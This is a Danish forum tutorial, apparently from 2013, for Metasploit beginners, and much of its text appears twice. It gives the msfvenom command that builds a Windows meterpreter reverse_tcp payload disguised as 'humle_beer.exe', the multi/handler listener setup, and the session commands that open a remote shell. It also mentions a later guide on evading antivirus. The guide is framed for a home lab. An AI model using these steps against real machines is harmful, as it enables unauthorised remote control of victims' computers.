01-08-2013, 15:38
Jeg besluttede mig for, at lave en metasploit begynder guide. Der findes masser af dem der ude, så det er bestemt ikke noget nyt, vist du er velkendt med metasploit.
Men jeg synes at tråden mangler guides især danske, alt for meget snak alt for lidt guides. Jeg vil forsøge så vidt muligt at lave flere, når tid er (jeg har meget tid i øjeblikket og vil prøve at lave mindst 1 hver anden dag). Kom endelig med respons på eventuel mangler forbedringer også :)
# Attention læs dette inden påbegyndelse
Frasigelse: Denne guide har til formål at lære om sikkerhedshuller i Windows. Det er til en hver tid bedst praktisk at gøre det i et sikkert kontrolleret miljø. Husk det er ulovligt at hacke andre og svare til at sparke døren ind i en anden vedkommens lejlighed. - Brug guiden på eget ansvar og ikke mit. (så er det ude af verden hårde tider :))
Ting du har brug for, for at få det til at virke:
Godt når du har det, er det vigtigt at din Kali er helt opdateret. Udføre derfor i terminalen:
Åben nu en 'Terminal' og indtast 'msfconsole' (det kan tag lidt tid at starte op)
Det skulle gerne se således ud:
Tag note af din IP adresse skriv den ned eller bare husk den.
Skriv i dit metasploit terminal vindue:
Nu skal vi til at lave vores egen exe fil som vi kan afprøve i vores Windows OS. Til det forsætter vi i vores metasploit terminal vindue. Med nogen tilhørende metasploit værktøjer til formålet.
Skriv følgende
Så langt så godt, er du kommet så langt med så klap dig selv på skulderen. Godt gået :)!
Nu har vi vores Windows OS klar og vores exploit som vi kan sende. Der kan man jo selv være lidt kreativ det gør ikke spor, du risikere kun at få en god idé ud af det.
Det vi blot mangler nu er at få vores metasploit til at lytte efter nogen som prøver at forbinde til os.
Så vi bevæger os tilbage til vores metasploit terminal vindue og skriver.
I mens vi har arbejdet på at få det hele sat op håber jeg du har været kreativ :) (i vmware kan du bare trække og slippe din humle_beer.exe ind i din Windows OS) kør vores humle_beer.exe på vores Windows OS klient og hold så øje med, metasploit terminal vinduet.
Det skulle gerne se så ledes ud:
FAQ:
Så der ikke meget andet at sige end stay safe, nu vil jeg ud og drikke en kold humle.
Kan du li guiden, så husk at bedømme den :)
./humle
Men jeg synes at tråden mangler guides især danske, alt for meget snak alt for lidt guides. Jeg vil forsøge så vidt muligt at lave flere, når tid er (jeg har meget tid i øjeblikket og vil prøve at lave mindst 1 hver anden dag). Kom endelig med respons på eventuel mangler forbedringer også :)
# Attention læs dette inden påbegyndelse
Frasigelse: Denne guide har til formål at lære om sikkerhedshuller i Windows. Det er til en hver tid bedst praktisk at gøre det i et sikkert kontrolleret miljø. Husk det er ulovligt at hacke andre og svare til at sparke døren ind i en anden vedkommens lejlighed. - Brug guiden på eget ansvar og ikke mit. (så er det ude af verden hårde tider :))
Ting du har brug for, for at få det til at virke:
- Kali Linux vmware image Download eller Metasploit standalone Downlaod
- Windows ISO image Download (husk at updatere, slå firewall og antivirus fra denne guide er ikke inklusiv en AV bypasser)
- Vmware Download
Godt når du har det, er det vigtigt at din Kali er helt opdateret. Udføre derfor i terminalen:
- apt-get update
- apt-get upgrade
- apt-get dist-upgrade
- Det kan tage lidt tid, lav en god kop kaffe :)
Åben nu en 'Terminal' og indtast 'msfconsole' (det kan tag lidt tid at starte op)
Det skulle gerne se således ud:
Tag note af din IP adresse skriv den ned eller bare husk den.
Skriv i dit metasploit terminal vindue:
- ifconfig
- Køre du vmware, er det med største sandsynlighed eth0 som visser den.
Nu skal vi til at lave vores egen exe fil som vi kan afprøve i vores Windows OS. Til det forsætter vi i vores metasploit terminal vindue. Med nogen tilhørende metasploit værktøjer til formålet.
Skriv følgende
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.8.135 LPORT=48653 -f exe > humle_beer.exe
- forklaring '-p' er vores PAYLOAD. 'LHOST' er din IP som lytter efter forbindelsen (den vi skulle huske). 'LPORT' er porten den lytter på. '-f' er vores format, i dette tilfælde en Windows exe. humle_beer.exe er vores exploit
Så langt så godt, er du kommet så langt med så klap dig selv på skulderen. Godt gået :)!
Nu har vi vores Windows OS klar og vores exploit som vi kan sende. Der kan man jo selv være lidt kreativ det gør ikke spor, du risikere kun at få en god idé ud af det.
Det vi blot mangler nu er at få vores metasploit til at lytte efter nogen som prøver at forbinde til os.
Så vi bevæger os tilbage til vores metasploit terminal vindue og skriver.
- use multi/handler
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 172.16.8.135
- set LPORT 48653 (port 48653 staver humle :)
- set ExitOnSession false
- Tjek dine indstillinger med 'show options'
- Når alle vores indstillinger er sat, er vi klar til at køre vores "lytter"
- exploit -j ( 'exploit' starter vores lytter '-j' udføre det som et baggrund job)
I mens vi har arbejdet på at få det hele sat op håber jeg du har været kreativ :) (i vmware kan du bare trække og slippe din humle_beer.exe ind i din Windows OS) kør vores humle_beer.exe på vores Windows OS klient og hold så øje med, metasploit terminal vinduet.
Det skulle gerne se så ledes ud:
- Skriv følgende når din metasploit terminal har fået forbindelsen
- sessions
- sessions -i 1 ( '-i' står for at interagere med, efterfuldt af nummeret på sessionen)
- shell
- Nu har vi en shell direkte til vores Windows OS
- Det ok at blive lidt kreativ igen :)
FAQ:
- Nej jeg hedder ikke Henrik, brugeren er lavet til dette formål.
- Det en Windows 8 64bit, som Henrik var bruger på.
- Kan jeg komme forbi AV og Firewall på denne måde. Nej der skal lidt ekstra til, for at forbipassere det. Det er ikke formålet med guiden her.
- Hvordan kommer jeg forbi AV. Der kommer et link HER til den næste guide som forbipassere den.
Så der ikke meget andet at sige end stay safe, nu vil jeg ud og drikke en kold humle.
Kan du li guiden, så husk at bedømme den :)
./humle